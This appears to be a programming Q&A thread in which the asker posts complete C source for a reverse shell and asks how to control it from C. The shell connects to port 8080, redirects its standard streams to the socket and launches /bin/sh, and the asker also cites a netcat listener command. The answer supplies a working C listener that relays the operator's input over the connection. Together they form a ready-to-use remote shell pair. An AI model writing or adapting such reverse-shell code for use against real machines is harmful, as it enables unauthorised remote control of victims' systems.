Within Python 3 I can utilize the telnetlib's library to use/import the method interact which can allow me to stream stdin to a socket passed to the interact method. Additionally netcat provides similar features (except being able to programmatically pass a socket within Python 3 of course) for instance: nc -nvlp 8080.
My questions are:
Is there a way to programmatically replicate the behavior of telnetlib's interact method/streaming the stdin stream to a given socket within C? Or is this process convoluted? If it is simplistic, how could the interact method's logic be replicated within C?
For instance say I was running a simple client C reverse shell program similar to SSH that uses dup2 to stream stdin, stdout, stderr to a duplicated socket file descriptor. How would I be able to communicate with this client programmatically within C?
Example C client I am trying to communicate with programmatically:
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define REMOTE_ADDR "127.0.0.1"
#define REMOTE_PORT 8080
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
for (int i=0; i<3; i++)
dup2(s, i);
execve("/bin/sh", 0, 0);
return 0;
}
To summarize: I am basically trying to communicate with the provided client programmatically within C.
I am basically trying to communicate with the provided client programmatically within C.
A program which does what you want needn't be big; here's a simple example:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 8080
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(PORT);
int s = socket(AF_INET, SOCK_STREAM, 0);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) perror("bind"), exit(1);
listen(s, 0);
int t = accept(s, NULL, NULL);
if (t < 0) perror("accept"), exit(1);
fd_set fds, fdr;
FD_ZERO(&fds);
FD_SET(0, &fds); // add STDIN to the fd set
FD_SET(t, &fds); // add connection to the fd set
while (fdr = fds, select(t+1, &fdr, NULL, NULL, NULL) > 0)
{ char buf[BUFSIZ];
if (FD_ISSET(0, &fdr))
{ // this is the user's input
size_t count = read(0, buf, sizeof buf);
if (count > 0) write(t, buf, count);
else break; // no more input from user
}
if (FD_ISSET(t, &fdr))
{ // this is the client's output or termination
size_t count = read(t, buf, sizeof buf);
if (count > 0) write(1, buf, count);
else break; // no more data from client
}
}
}
The key part is the select loop which checks for STDIN or the socket connection to be readable and copies the read data to the other side.